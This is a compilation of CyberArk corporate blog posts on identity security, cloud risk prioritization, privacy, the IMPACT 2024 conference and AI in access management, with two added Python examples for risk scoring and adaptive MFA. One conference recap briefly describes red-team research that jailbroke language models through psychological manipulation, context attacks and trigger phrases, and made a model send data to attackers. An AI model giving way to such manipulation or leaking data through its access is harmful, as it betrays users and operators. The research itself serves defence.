    As new technologies such as generative AI, telehealth and electronic health records expand the healthcare landscape, they also introduce new vulnerabilities. Identity security acts like a selective barrier, allowing beneficial innovations while protecting against potential threats. This balance supports innovation and safeguards the system’s integrity.

Identity Security Strategies for Healthcare Providers

In the dynamic and ever-expanding healthcare field, the cybersecurity landscape is fraught with challenges that can impede safe and effective patient care. Identity security addresses these challenges by fortifying the infrastructure that handles sensitive patient information. Identity security responds to immediate threats and builds resilience by anticipating and neutralizing potential vulnerabilities through the following actions:

  • Securing sensitive data through measures such as multi-factor authentication (MFA), encryption and access management. As digital health data proliferates, so does the need to protect it against unauthorized access and breaches.
  • Maintaining regulatory compliance by enforcing compliant policies and avoiding penalties and legal complications. A complex web of regulations regarding data protection binds healthcare providers to protect patient privacy.
  • Mitigating insider threats by monitoring and managing user access and data usage within the organization. Like a body’s cells turning against it, insider threats can be as damaging as external attacks – identity security can significantly reduce the risk of insider misconduct.

By addressing these challenges, identity security protects against immediate threats and strengthens the healthcare system’s ability to adapt to new technologies and evolving threats, ensuring long-term health and resilience. This proactive approach is vital to maintaining a secure and trustworthy environment where healthcare providers can focus on delivering the highest quality patient care.

Safeguarding the Future: Identity Security in Healthcare

Cybersecurity leaders and healthcare stakeholders increasingly recognize that identity security is crucial. It acts as the immune system of the digital healthcare organism, essential for maintaining operational health and enabling the safe adoption of innovations. As healthcare evolves, the commitment to strong identity security measures will be vital to delivering patient care that is both secure and progressive.

Discover how companies apply an identity security-first approach to implement Zero Trust and protect personal health information (PHI) for 1.8 million members.

Lee Godby is a business development director, and Brian Carpenter is a senior business development director at CyberArk.

]]>
Triage Your Cloud Security: Risk Prioritization Methods https://www.cyberark.com/blog/triage-your-cloud-security-risk-prioritization-methods/ Tue, 04 Jun 2024 14:12:35 +0000 https://www.cyberark.com/?p=191796

It’s a familiar post-disaster scene in seemingly every television medical drama. A ferry has crashed, or a train has derailed. Patients flood into the ER, each requiring urgent medical attention. The impossibly attractive medical staff must quickly assess and prioritize patients based on the severity of their injuries and the likelihood of survival. Someone with great hair likely says an inspiring quote and jumps immediately into action.

To carry the plot, the medical staff often struggles to make decisions under pressure, leading to confusion and delays in treatment. As the chaos intensifies, the absurdly well-lit ER becomes overwhelmed, with patients and their families increasingly anxious and frustrated. The risk of medical errors and adverse outcomes rises, further compounding the crisis. And then your favorite character probably gets killed off. All thanks to one element the writers left out of the scene: triage. Great TV – terrible medicine.

While the chaos of a TV trauma center may seem far removed from the world of cybersecurity, the concept of triage is just as relevant when it comes to prioritizing and addressing cyberthreats. Just as medical staff must quickly assess and prioritize patients based on the severity of their injuries, organizations must also assess and prioritize cyberthreats to maintain order, efficiency and safety in any environment. With a multitude of identities possessing varying levels of privilege and access, the challenge lies in effectively prioritizing security measures.

Defining Risk: A Common Lens

Before delving into the prioritization strategies, a quick note about establishing a common understanding of risk. Organizations may define risk differently, but in our experience mitigating identity-related threats, we define risk as a combination of three fundamental factors:

  1. Level of privilege refers to the type of privilege granted to an identity, ranging from read-only access to full administrative control, including the ability to modify other identities’ permissions.
  2. Scope of influence, also known as the blast radius, describes the extent to which an identity can access systems and resources. This can range from access to a single cloud-native service to multiple services with access to elastic workloads to full access to every resource and service.
  3. Ease of compromise refers to the level of difficulty for a malicious actor to compromise access. This includes the existence of technical vulnerabilities and the level of controls applied to protect the identity.

Building on this definition of risk, let’s examine two effective risk-based prioritization methods that can provide a framework for triaging your cloud security priorities.

Method No. 1: Security Control-Based Risk Prioritization

Our first method for triaging cloud security priorities is based on the understanding that not all organizations can deploy all security controls simultaneously. Therefore, priorities are determined by assessing the risk impact and the effort required for mitigation. In this approach, organizations implement security controls iteratively, focusing on specific control families. If we look back at the triage scene, this would be like simultaneously treating patients with similar injuries.

The recommended prioritization for this control-based method follows these steps:

  1. Progress toward zero standing privileges (ZSP). You can work toward achieving this by implementing role-based access, multi-factor authentication (MFA), session protection and audit functionalities. ZSP helps to ensure that users only have access to resources when needed and for the duration necessary to perform their tasks. Controls facilitating ZSP are prioritized to mitigate the sprawl of excessive access. This step will have the most significant impact on minimizing risk.
  2. Implement standing privileged access controls. This can be done through credential vaulting, password management, MFA and session monitoring. Prioritize root and registration account security, minimize freestanding access and use robust credential management for necessary cases. Continuously refine non-emergency account privileges to enforce least privilege.
  3. Deploy secrets management controls. This includes secrets vaulting, rotation, complex policies, removal of hard-coded secrets and just-in-time (JIT) delivery to applications. Focus on refining privileges for machine workloads and apply these controls to machine passwords and keys to mitigate credential theft and privilege abuse.
  4. Establish identity governance controls. Focus on lifecycle management and compliance mechanisms. Start by rolling out lifecycle management to IT admin roles, followed by developers and other privileged roles. Ensure roles are explicitly defined and implement identity compliance across all human users to certify and adjust access as needed periodically.

Method No. 2: Identity/Persona-Based Risk Prioritization

In contrast to security control-based prioritization, the second method for triaging cloud security priorities focuses on securing identities based on their roles or personas, assuming simultaneous application of all security control families. The ideal prioritization hierarchy, which would be akin to treating women and children first in our triage scenario, typically follows this sequence:

  1. Secure root and registration accounts. Start by securing high-privileged accounts, such as those with Global Administrator access, with measures like MFA.
  2. Prioritize IT administrators. Focus on roles with extensive administrative access across cloud service provider (CSP) accounts, as they have the potential for the most significant impact.
  3. Tailor security controls for developers and service administrators. Apply tailored security controls to individuals with privileged access to specific services or resources within CSPs.
  4. Address other application and audit teams. Secure users with lesser privileges, including read-only access.
  5. Safeguard machine workloads and cloud-native services. Protect automation and orchestration workloads, often with sensitive permissions, using secrets management and least privilege controls.
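The risk definition above (level of privilege, scope of influence, ease of compromise) and the two prioritization methods can be made concrete as a small triage routine. The following is an added example written for this page; it is not code from the post or from CyberArk. The numeric scales, the multiplicative combination of the three factors, the set of recognized controls and the sample identities are all assumptions constructed for illustration. It ranks a handful of cloud identities two ways: by raw risk score (closer to Method No. 1, where the biggest risk reduction is tackled first) and by persona tier (Method No. 2), and it flags the standing admin-level access that a zero standing privileges effort would target first.

```python
from dataclasses import dataclass
from enum import IntEnum


class Privilege(IntEnum):
    """Level of privilege, the first risk factor (assumed 1-4 scale)."""
    READ_ONLY = 1
    WRITE = 2
    ADMIN = 3
    IDENTITY_ADMIN = 4  # can modify other identities' permissions


class Scope(IntEnum):
    """Scope of influence, i.e. blast radius (assumed 1-3 scale)."""
    SINGLE_SERVICE = 1
    MULTI_SERVICE = 2
    ALL_RESOURCES = 3


# Compensating controls named in the post; each one applied lowers ease of compromise.
CONTROLS = frozenset({"mfa", "vaulting", "session_monitoring", "jit", "rotation"})

# Method No. 2 ordering: lower tier number is triaged earlier.
PERSONA_TIER = {
    "root": 1,
    "it_admin": 2,
    "developer": 3,
    "service_admin": 3,
    "app_team": 4,
    "audit": 4,
    "machine": 5,
}


@dataclass(frozen=True)
class Identity:
    name: str
    persona: str
    privilege: Privilege
    scope: Scope
    controls: frozenset = frozenset()
    hardcoded_secret: bool = False  # e.g. a key checked into source
    standing: bool = True  # standing (always-on) access rather than JIT


def ease_of_compromise(ident: Identity) -> int:
    """Third risk factor on an assumed 1 (hard) to 6 (trivial) scale:
    one point per missing control, plus one for a hard-coded secret."""
    missing = len(CONTROLS - ident.controls)
    score = 1 + missing + (1 if ident.hardcoded_secret else 0)
    return min(score, len(CONTROLS) + 1)


def risk_score(ident: Identity) -> int:
    """Combine the three factors multiplicatively: a read-only identity on a
    single service with strong controls scores low; an unprotected identity
    admin with access to everything scores highest."""
    return int(ident.privilege) * int(ident.scope) * ease_of_compromise(ident)


def rank_by_score(identities):
    """Pure risk ordering, independent of persona."""
    return sorted(identities, key=lambda i: (-risk_score(i), i.name))


def triage(identities):
    """Persona-based triage (Method No. 2): persona tier first, then
    risk score descending within the tier."""
    return sorted(identities, key=lambda i: (PERSONA_TIER[i.persona], -risk_score(i), i.name))


def zsp_violations(identities):
    """Method No. 1, step 1: standing admin-level access without JIT delivery
    is the first candidate for zero standing privileges."""
    return [i.name for i in identities
            if i.standing and i.privilege >= Privilege.ADMIN and "jit" not in i.controls]


# Constructed sample inventory (not real accounts).
SAMPLE_IDENTITIES = [
    Identity("aws-root", "root", Privilege.IDENTITY_ADMIN, Scope.ALL_RESOURCES,
             frozenset({"mfa", "vaulting"})),
    Identity("cloud-admin-bob", "it_admin", Privilege.ADMIN, Scope.ALL_RESOURCES,
             frozenset({"mfa"})),
    Identity("dev-alice", "developer", Privilege.WRITE, Scope.MULTI_SERVICE,
             frozenset({"mfa", "jit"}), standing=False),
    Identity("auditor-carol", "audit", Privilege.READ_ONLY, Scope.MULTI_SERVICE,
             frozenset({"mfa"})),
    Identity("ci-deploy-svc", "machine", Privilege.ADMIN, Scope.MULTI_SERVICE,
             frozenset(), hardcoded_secret=True),
]

if __name__ == "__main__":
    print("By risk score:")
    for ident in rank_by_score(SAMPLE_IDENTITIES):
        print(f"  {ident.name:16} score={risk_score(ident)}")
    print("Persona-based triage order:")
    for ident in triage(SAMPLE_IDENTITIES):
        print(f"  tier {PERSONA_TIER[ident.persona]}  {ident.name}")
    print("Standing admin access to move toward ZSP:", zsp_violations(SAMPLE_IDENTITIES))
```

Running it shows where the two methods disagree: the CI service account with a hard-coded secret and no controls scores higher than the developer on raw risk, but the persona ordering still puts machine workloads last, which is exactly the trade-off the post asks you to make deliberately rather than by accident.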

A Note on Regulatory Compliance

Regulatory compliance is a critical factor to consider when prioritizing security measures. Adhering to frameworks such as GDPR, HIPAA or SOC 2 is essential for ensuring data protection and privacy. To align your risk prioritization efforts with regulatory mandates, consider the following steps:

  1. Implement Data Protection Requirements. Take steps to safeguard sensitive data and comply with data protection regulations by implementing new or additional security controls.
  2. Establish Auditing and Reporting Mechanisms. Set up mechanisms for auditing and reporting to demonstrate compliance with regulatory requirements.
  3. Develop Incident Response Preparedness. Create incident response plans and procedures to address data breaches and security incidents in compliance with regulatory guidelines.

Streamlining Your Cloud Security Risk Prioritization

Just like in a TV medical drama, effective prioritization is essential when dealing with many threats, including cyberthreats. The coiffed chief of surgery has aligned the triage strategy with standard Hollywood hospital protocol. Each staff member has a clearly defined role; every patient is cared for when needed. Someone with great hair still probably says an inspiring quote.

By addressing the common challenges and considerations outlined in this blog, organizations can more effectively navigate the complexities of risk prioritization, enhance their cloud security posture and ensure compliance with regulatory mandates.

Effective risk prioritization requires a nuanced understanding of risk dynamics and a strategic, adaptive approach. Organizations can use a combination of security control-based and identity/persona-based approaches to enhance their resilience against evolving cyberthreats while optimizing resource allocation and effort.

The bottom line is that cutting the drama in your cloud security requires risk prioritization. A clear strategy and well-defined priorities can help maintain order, efficiency and safety in your cloud environment.

To dive deeper into cloud security fundamentals and learn how it plays into compliance, check out our whitepaper 2024 Playbook: Identity Security and Cloud Compliance.

Alyssa Miles is a product marketing manager at CyberArk.

]]>
Synchronized Swimming: The Relationship Between Privacy and Cybersecurity Teams https://www.cyberark.com/blog/synchronized-swimming-the-relationship-between-privacy-and-cybersecurity-teams/ Thu, 30 May 2024 16:49:07 +0000 https://www.cyberark.com/?p=191669

Data theft, data protection and the leakage of passwords or secrets are the top two cloud security concerns for 2,400 cybersecurity experts, according to the recently released CyberArk 2024 Identity Security Threat Landscape Report. In an ever-brewing digital ecosystem of multi-cloud environments, countless on-prem and SaaS applications, and third- and fourth-party providers, 94% of organizations report having faced at least one identity-related breach in the last 12 months. Nearly all (99%) of these victimized organizations report negative impacts on business, such as the cost of recovery and the financial burden of lawsuits and regulatory fines.

Post-breach scenarios are often tense and scrutinized heavily by stakeholders, including auditors, boards of directors, customers and shareholders. In such a scenario, cybersecurity teams intensify their focus on remediation and containment of the attack. In contrast, privacy teams focus on understanding and limiting the extent of regulatory non-compliance, potential fines and customer impact. The impact of a breach extends beyond the cybersecurity teams to others, including privacy teams critical to defining data privacy requirements.

Yet, often, organizations make the mistake of carving individual swim lanes for the roles and responsibilities of cybersecurity vs. privacy teams. This approach is simply bad practice – I am convinced that privacy and cybersecurity should be on the same team, working in lockstep with one another, similar to synchronized swimmers.

At its best, synchronized swimming is not just a beautiful sight but a challenging sport that takes enormous effort and commitment to get right. Drawing on the concept of synchronization, it’s essential to understand that privacy and cybersecurity are not separate swim lanes with competitive goals; they are inseparable components of a perfectly synchronized swimming act. I think cybersecurity and privacy are much like the individual athletes committed to a group sport with a singular goal – securing sensitive data and maintaining confidentiality.

Let me explain how.

The Inseparable Bond Between Privacy and Cybersecurity Teams

Privacy and cybersecurity teams need to collaborate more to ensure the highest level of protection for their organizations’ sensitive assets. For example, the Chief Privacy Officer’s (CPO’s) team should ideally define a data collection, retention, storage and usage policy. The policy should address critical questions, including what organization is collecting the data, its purpose and intended use, the data processing location, the data retention duration and, most importantly, who is authorized to access it.

Only when this is defined can the Chief Information Security Officer (CISO) and their cybersecurity team ensure data is protected throughout its lifecycle, mainly when it’s in use, in flight and at rest in the appropriate geographical location as required by regulations.

Now, consider a situation where the CPO and CISO aren’t actively collaborating. We can assume that data or access to data is secured but not per the applicable (country and industry-related) privacy laws. Such conditions can lead to heavy non-compliance fines but not a data breach. For a robust cybersecurity and privacy program, privacy teams must classify the data sensitivity level by law so cybersecurity teams can apply security controls to protect it.

The CPO and CISO must collaborate regularly to consider the impact on confidentiality, integrity and availability of data and privacy. The industry interchangeably uses the words confidentiality and privacy, but they are different. Confidentiality can be enabled through agreements between two or more parties that limit data sharing by controlling access.

Ethical considerations can also play a role in limiting data sharing and enabling confidentiality. On the other hand, privacy is the right to freedom from intrusion into personal information. Adopting disparate tools or processes in a siloed manner will only increase gaps in maintaining the confidentiality and privacy of data. A synchronized approach wherein privacy teams classify data requirements and cybersecurity experts use this framework to secure data is the only proper approach to maintaining confidentiality and data privacy.

Cybersecurity Tools and PETs: A Comprehensive Approach to Data Protection

As a technology leader, I see a combination of cybersecurity tools and privacy-enhancing technologies (PETs) in today’s market. For example, data encryption in flight or at rest, data masking or obfuscation protects sensitive information in many ways. While cybersecurity capabilities have been around for a long time and continue to evolve, PETs are relatively new and aim to protect private data in a regulated landscape. Many PETs, like data security posture management (DSPM) as part of a cloud-native application protection platform (CNAPP), already enable streamlined data security and privacy capabilities. Other PETs, like homomorphic encryption or confidential computing, are built to address specific use cases, such as maintaining data privacy.

Homomorphic encryption and confidential computing both show promise in enhancing privacy. However, as mentioned earlier, these technologies have yet to be widely adopted. Confidential computing is not easy to adopt and is not yet a multi-purpose technology. It is limited to some use cases, mainly in cloud-based encryption for data-in-use. As a result, they are far from being adopted at scale. In this case, the only way to ensure data confidentiality and privacy is by securing every human and machine identity that accesses sensitive data across your IT environment.

Identity at the Core of Privacy

Maintaining privacy by securing access for all identities involves managing access rights effectively for every identity throughout its lifecycle. The privacy teams outline access to resources for every identity based on the roles of every business function. Whether it’s sales representatives accessing customer data, HR professionals handling sensitive employee information, or IT managers overseeing system resources, it’s essential to uphold the principle of least privilege (PoLP) to ensure that only the right people have access to specific data, reducing the risk of unauthorized data exposure. Implementing comprehensive Identity and Access Management (IAM) controls and capabilities is necessary to secure access for all identities and maintain privacy.

Here are two examples:

  • An adaptive form of multi-factor authentication (MFA) can enable organizations to strengthen their security posture through additional checks to validate identities in multiple layers.
  • Automated lifecycle management can help organizations easily define and enforce each user’s unique role, responsibilities and access privileges.
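To make the first of these examples concrete, here is an added illustration (not code from the original post) of how an adaptive MFA decision can be layered on top of a least-privilege entitlement check: the role must be entitled to the resource at all before any risk scoring happens, and the contextual signals then decide between allowing with the primary factor, requiring a step-up factor, or denying. Roles, resources, risk signals, weights, thresholds and the sample identities are all assumptions made for the example; a real deployment would source the signals from the identity provider and a device posture service.

```python
"""Risk-adaptive MFA decision for an access request.

Added example, not code from the original post. An adaptive MFA policy
first checks that the role is entitled to the resource at all (least
privilege, default deny), then scores contextual signals to decide whether
the primary factor suffices, a step-up factor is required, or the request
is denied. Signal names, weights, thresholds and the sample identities
are constructed assumptions for illustration.
"""
from dataclasses import dataclass
from datetime import datetime, timezone


@dataclass(frozen=True)
class AccessRequest:
    user: str
    role: str
    resource: str
    source_country: str
    device_id: str
    at: datetime  # timezone-aware


@dataclass
class IdentityProfile:
    """What the IdP already knows about an identity (constructed sample data)."""
    roles: set
    known_devices: set
    usual_countries: set
    work_hours_utc: tuple = (6, 20)  # [start, end) hour of day, UTC


# Entitlements per role. Anything not listed is denied (least privilege).
ROLE_RESOURCES = {
    "sales-rep": {"crm:accounts"},
    "hr-partner": {"hris:employee-records"},
    "it-admin": {"crm:accounts", "hris:employee-records", "infra:prod-console"},
}

# Resources sensitive enough to always push a request into step-up territory.
SENSITIVE_RESOURCES = {"hris:employee-records", "infra:prod-console"}

# Constructed sample identities.
PROFILES = {
    "alice": IdentityProfile({"sales-rep"}, {"laptop-a1"}, {"US"}),
    "bob": IdentityProfile({"hr-partner"}, {"laptop-b7"}, {"DE"}),
    "carol": IdentityProfile({"it-admin"}, {"laptop-c3"}, {"US"}),
}

STEP_UP_THRESHOLD = 20
DENY_THRESHOLD = 70


def risk_score(req: AccessRequest, profile: IdentityProfile):
    """Sum weighted contextual signals; return (score, reasons)."""
    score, reasons = 0, []
    if req.device_id not in profile.known_devices:
        score += 40
        reasons.append("unknown device")
    if req.source_country not in profile.usual_countries:
        score += 30
        reasons.append("unusual source country")
    start, end = profile.work_hours_utc
    if not (start <= req.at.astimezone(timezone.utc).hour < end):
        score += 15
        reasons.append("outside usual working hours")
    if req.resource in SENSITIVE_RESOURCES:
        score += 20
        reasons.append("sensitive resource")
    return score, reasons


def decide(req: AccessRequest, profile: IdentityProfile):
    """Return ('allow' | 'step_up' | 'deny', reasons)."""
    # Authorization comes first: a second factor never compensates for a
    # role that has no business need for the resource.
    entitled = (req.role in profile.roles
                and req.resource in ROLE_RESOURCES.get(req.role, set()))
    if not entitled:
        return "deny", ["role not entitled to resource"]
    score, reasons = risk_score(req, profile)
    if score >= DENY_THRESHOLD:
        return "deny", reasons
    if score >= STEP_UP_THRESHOLD:
        return "step_up", reasons
    return "allow", reasons


def evaluate(user, role, resource, country, device, iso_timestamp):
    """Convenience wrapper: build the request from plain values and decide."""
    req = AccessRequest(user, role, resource, country, device,
                        datetime.fromisoformat(iso_timestamp))
    return decide(req, PROFILES[user])[0]


if __name__ == "__main__":
    print(evaluate("alice", "sales-rep", "crm:accounts", "US", "laptop-a1",
                   "2024-05-21T14:00:00+00:00"))  # allow
    print(evaluate("bob", "hr-partner", "hris:employee-records", "DE", "laptop-b7",
                   "2024-05-21T09:00:00+00:00"))  # step_up
    print(evaluate("carol", "it-admin", "infra:prod-console", "RU", "unknown-usb",
                   "2024-05-21T03:00:00+00:00"))  # deny
```

The ordering matters: entitlement is evaluated before risk, so an unentitled request is denied even from a trusted device, and a sensitive resource alone is enough to demand a second factor even when every other signal looks normal.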

Privacy and Cybersecurity: A Synchronized Act

I am convinced that cybersecurity enables privacy – and not vice versa. To illustrate this theory, let’s look at the relationship between the different layers of swimmers in a synchronized swimming “lift.” The base is a swimmer underwater at the bottom of a lift. The base swimmers provide the force for pushers to stand up explosively and thrust flyers, the top layer of this aquatic human pyramid.

Our industry’s privacy teams are the equivalent of the pushers, with a core strength of data privacy regulatory requirements and a thorough understanding of the law. The base swimmers are cybersecurity teams who harness their information technology (IT) background and technical skills to implement security controls according to the regulatory requirements outlined by the privacy teams (the pushers).

Without the pushers, cybersecurity teams (the base) will secure data and access to it, but not in accordance with applicable laws. As such, cybersecurity teams enable privacy teams to fulfill their responsibilities better. With the pushers and the base strong in their positions, the flyers are athletes thrust upward – or, for the sake of this comparison, the flyers are the average business user (or identities) – who can execute their daily tasks productively and securely while maintaining confidentiality and privacy.

When privacy and cybersecurity teams collaborate and align, it feels like a perfectly executed synchronized swimming performance with the three groups of athletes – the flyers, the pushers and the base – in perfect lockstep.

The Perfectly Synchronized Act of Privacy and Cybersecurity Teams

As easy as this act looks, it isn’t, unless it’s planned strategically and collaboratively. As much as synchronized swimming is a treat to behold, it’s a demanding sport with dangerous and challenging maneuvers. For cybersecurity teams, these challenges and difficulties translate to a changing regulatory landscape, an evolving threat landscape, a deepening digital ecosystem of third- and fourth-party providers and an increasing number of identities with access to growing sensitive datasets, among other concerns.

However, our act as cybersecurity leaders and technologists can be a virtual treat in collaboration with the privacy teams and with a regularly evaluated risk framework.

All this talk about synchronized swimming has gotten me thinking of the Summer Games set to take place in France this year. I look forward to watching the swimming heats and synchronized swimming competitions this summer. While doing so, I’ll brainstorm how to actively and effectively coordinate with privacy teams to protect sensitive data for CyberArk and our customers. I kid you not.

I hope you’re inspired to do the same.

Omer Grossman is the global chief information officer at CyberArk. You can check out more content from Omer on CyberArk’s Security Matters | CIO Connections page.
IMPACT 2024: It’s Time for a Paradigm Shift in Identity Security
https://www.cyberark.com/blog/impact-2024-its-time-for-a-paradigm-shift-in-identity-security/
Fri, 24 May 2024 16:36:39 +0000

What a week! We just wrapped up CyberArk IMPACT 2024, the world’s largest identity security-focused conference. It was amazing to be joined by thought leaders and practitioners from around the world to talk about the present and future of identity security. Nashville provided a colorful, musical backdrop for this year’s event, which was the perfect combination of information exchange and networking in a dynamic, fun event experience.

Thank you to our customers, partners, employees and everyone who made the trip to Nashville! Your engagement and enthusiasm were palpable across the entire three days, and I could not be more excited and inspired about the road ahead. As I reflect on the many highlights, I’m filled with gratitude for this incredible community and energized by the meaningful work we’re doing together to create a safer digital world for all.

Embracing Change: Paradigm Shifts in Music and Identity Security

At IMPACT ’24, we talked about paradigm shifts – in music, we were in Nashville after all, and in identity security. There is no better example of an industry that has embraced paradigm shifts than the music industry. Over the past 25 years, we’ve all experienced firsthand the evolution of new technology, new access methods and new experiences when it comes to how we purchase and consume music.

When it comes to securing identities, a paradigm shift is also required. Every organization is facing new forces that are creating a rapid increase in the number and types of identities and increasingly complex hybrid cloud environments to secure. These forces are driving new attack methods, which are made even more sophisticated and effective by AI. We believe that to be secure, every identity, from workforce and IT users to developers and machines, needs the right level of privilege controls intelligently applied. Equally important, we need to provide these controls without getting in the way of productivity, efficiency and innovation. This is the paradigm shift that we must all make to keep our people and our organizations safe from cyberthreats.

CyberArk + Venafi: Securing Machine Identities at Scale

To tackle the growing challenge of securing machine identities at scale, we were thrilled to announce that we’ll be joining forces with Venafi, a leader in machine identity management. The combination of Venafi’s certificate lifecycle management, private public key infrastructure (PKI), IoT identity management and cryptographic code signing with CyberArk’s secrets management capabilities will enable organizations to keep machine-to-machine connections and communications secure. This acquisition marks a pivotal milestone for CyberArk and we look forward to leveraging our collective strengths to deliver end-to-end machine identity security to our customers once the deal closes.

In addition, there is no greater honor than sharing the IMPACT stage with cybersecurity leaders on the front lines. Our customers’ real-world stories of innovation and ingenuity inspired us while bringing today’s greatest identity security challenges into sharp focus. Security leaders from Healthfirst, Unilever and IHG Global talked about how they are applying privilege controls to meet the unique needs of users across their organizations. Dozens of other customers spoke at breakout sessions. Thank you to these wonderful customers for sharing your insights and learnings with the broader community.

A New Era of Productivity and Security with CyberArk CORA AI

We also shared some exciting news on the product front with new capabilities across our platform. Most notably, we introduced CyberArk CORA AI, a new set of AI-powered capabilities that will be embedded within our platform to make our customers more productive and more secure. Much more than a digital assistant, CORA AI will fundamentally transform how users interact with the CyberArk Identity Security Platform, reducing the time it takes to sift through human and machine identity data to analyze anomalies and apply next-level identity threat detection and response actions from hours to minutes.

IMPACT ’24 was by far our largest and most engaging conference ever. It was an honor to be surrounded by so many customers and partners who share our vision for identity security. Not to mention the wonderful CyberArk employees who contributed to deliver an amazing event experience.

The world is changing rapidly. We simply cannot expect the paradigms of the past to solve today’s problems, let alone prepare us for what’s to come. Our time in Nashville provided a glimpse into what’s possible when you flip the script – and how shifting paradigms can truly transform an industry. I’m incredibly excited for the journey ahead as we continue to shape the future of identity security together.

Next, on to IMPACT World Tour as we take the experience to cities around the world.

Matt Cohen is the CEO of CyberArk.

The Future of Identity Security: Insights from CyberArk IMPACT 24
https://www.cyberark.com/blog/the-future-of-identity-security-insights-from-cyberark-impact-24/
Wed, 22 May 2024 20:20:17 +0000

CyberArk IMPACT 24 in Nashville was a week packed with firsts for me:

  • My first time in Nashville.
  • My first time at our flagship global event.
  • My first time being involved in a genuinely significant acquisition: Monday’s Venafi announcement.

And not to be too trite – IMPACT 24 is a conference, after all – it was a week packed with The New. Day One of IMPACT is typically a quieter day, with many side events and no keynotes, serving as the calm before the storm. This time, Day One began at 7 a.m. with the zero-to-sixty-mph-in-three-seconds news that CyberArk announced the $1.5 billion acquisition of machine identity management leader Venafi.

As well as sparking an immediate media frenzy, this news and what it means for identity security – particularly for securing machine identities – infused the whole IMPACT 24 event. CyberArk CEO Matt Cohen talked about it in terms of broken models and the need to change, to introduce new thinking and a new model. He drew a parallel with the record industry. He took us back to the days of buying a vinyl album from a physical store and listening to it all the way through*. He then reminded us of what happened to that industry and its once-major players when they stayed still. They waited for events to happen to them instead of driving the change, many soon ceasing to exist as a result. A guest speaker on Day Three perhaps put it best: “Waiting for something to occur is not a luxury that firms have anymore.”

Matt also discussed the need for a paradigm shift in how we secure identities, a framework that will create a better path to the desired result. Why is this necessary? We all face immense and growing identity challenges, and how we currently secure these identities is often siloed and inefficient. But they must be secured; it is critical to do so. As another speaker from a global consultancy firm bluntly stated, “Everything bad that happened to your organization started with a compromised identity.”

The Future of Identity Security: Harnessing the Power of GenAI

The proliferation of identities was a thread running through many of the IMPACT 24 talks from the CyberArk team and our customers and partners. Organizations have so much more to deal with today than in the quaint, dim-and-distant days of, say, five years ago. Security has moved from perimeter-based to identity-centric and can only be delivered effectively through the use of automation built on Zero Trust principles. In the succinct words of one of our customers on what multi-cloud means for his organization’s employees, their identities and access demands, “It’s global, it’s everywhere, it’s all hours.”

How is this new paradigm of identity security going to be delivered? New paradigms are not just about knowing where you want to get to – they must include how you get there – or they’re just hot air. GenAI was, of course, a key theme of the conference and will be one of the building blocks of this new model of securing human and machine identities. GenAI has changed our relationship with data, allowing us to interact with it more conversationally rather than simply searching for it. GenAI will play a pivotal role in attacks by enabling the democratization of advanced attacks. It will also be central to cyber defenses. At IMPACT 24, the announcement of CyberArk CORA AI represents, in part, how this new model will be delivered through a new set of AI-powered capabilities that, over time, will be embedded across the CyberArk Identity Security Platform.

A Look Back: (a Couple of) My Favorite IMPACT 24 Moments

I mentioned at the outset that this was my first time at our flagship U.S. conference. Our IMPACT World Tour events take place throughout 2024 and are a great way of bringing the experience closer to our customers, but Nashville is on a larger scale. Among the many aspects that I enjoyed:

   1. CyberArk Labs sessions are always a favorite of mine, particularly when VP of Cyber Research Lavi Lazarovitz presents. As usual, he didn’t disappoint at IMPACT 24. The big reveal included his team’s work on attacking AI models via malicious prompts. They used the privileged access of an AI model to send data to attackers and jailbroke large language models (LLMs). By taking advantage of their design flaws, they manipulated the LLMs to share information they were not supposed to. These included psychological manipulations, context attacks and moral bugs, where certain words and phrases overcome the LLM restrictions.

   2. One of the event’s highlights was the Day Three fireside chat with CyberArk VP of Brand Experience Anna Walsh, our Founder and Executive Chairman Udi Mokady and Robert Herjavec. Yes, that Robert Herjavec. Robert, of course, is the CEO of Cyderes and Shark Investor on ABC’s “Shark Tank.” The learnings of their formative years in the industry were poignant, from Robert talking his way into the IT industry to sell mainframes by offering to work for free to Udi’s early days at CyberArk selling the idea that leaving – metaphorically – the valuable stuff (critical data and assets) lying on a table in a locked house with an open window was a flawed concept.

Finally, IMPACT wouldn’t be IMPACT without the people who make it happen, from the event team to all our speakers, sponsors, partners and customers – a huge thanks to all of you.

*Yes, I still listen to albums all the way through.

Nick Bowman is director of media relations at CyberArk.

Predicting the Future of AI in Identity and Access Management
https://www.cyberark.com/blog/predicting-the-future-of-ai-in-identity-and-access-management/
Tue, 21 May 2024 18:50:03 +0000

In the rapidly changing cybersecurity landscape, Identity and Access Management (IAM) is a critical pillar, safeguarding organizational data and access across different enterprise systems and platforms. As the head of CyberArk’s Artificial Intelligence Center of Excellence (AI CoE), I’m witnessing firsthand the transformative impact of artificial intelligence (AI) in this domain. AI is not just reshaping how we manage digital identities and access controls but also how we balance productivity and security.

After announcing the launch of CyberArk’s AI CoE last September, my team and I dedicated ourselves to understanding the needs of our customers and the industry. We conducted interviews, analyzed market trends and made predictions. At the same time, we began working on several imperative AI initiatives. Just over six months later, we have even more AI initiatives underway and many more in the planning stages.

This week, I’m participating in CyberArk’s annual IMPACT conference, where our customers and partners will preview CyberArk CORA™ AI*, the first wave of AI-powered capabilities that will be embedded across our Identity Security Platform and that we plan to release this year. In this post, I will share insights into our current work and the direction we envision for the future. While some predictions are involved, it’s important to note that they do not reflect our product roadmaps.

AI and the Security-Productivity Balancing Act

When developing AI-based capabilities for IAM systems, we often must choose between improving user productivity and enhancing security measures. Some AI capabilities streamline user operations and improve efficiency, while others aim to tighten security.

From conversations with customers, I understand they primarily see AI-based features as productivity boosters. These features help them work more efficiently and shorten the learning curve. Some AI-based features, like chatbots, focus on productivity, while others, like policy recommendation engines, combine productivity with security. These features can streamline users’ work and provide collective or heuristic-based knowledge, guiding them to make better decisions and enhance security.

Other capabilities, such as discovering and alerting suspicious activities, lean even further toward the security end of the spectrum. But, even in this case, there’s an argument that these capabilities also increase user productivity and effectiveness.

The Three Pillars of AI in IAM and What’s on the Horizon

The author's AI in IAM predictions, as illustrated in graphical format.

As charted in the illustration above, we’ve categorized AI in IAM into three main pillars for this blog post, each blending productivity enhancements with security improvements. While securing GenAI is an exciting topic, it only relates tangentially to IAM, so I’m not discussing it in this blog. Looking into the future, we can expect a wide range of technologies to emerge in each category, from the near and achievable to the more distant and complex.

So, with my (cyber) crystal ball in hand, to follow are my predictions (and my predictions only) for what will happen in each area of AI in IAM over the next few years.

1) Chatbots and AI Assistants

Imagine a world where intelligent AI assistants guide every interaction with your IAM system. Information retrieval, context-specific recommendations and even system configuration or debugging are delivered instantly and accurately. AI-driven chatbots and assistants in IAM will soon be able to provide not just text-based Q&A interactions but also context-aware recommendations that include integrations with third-party systems.

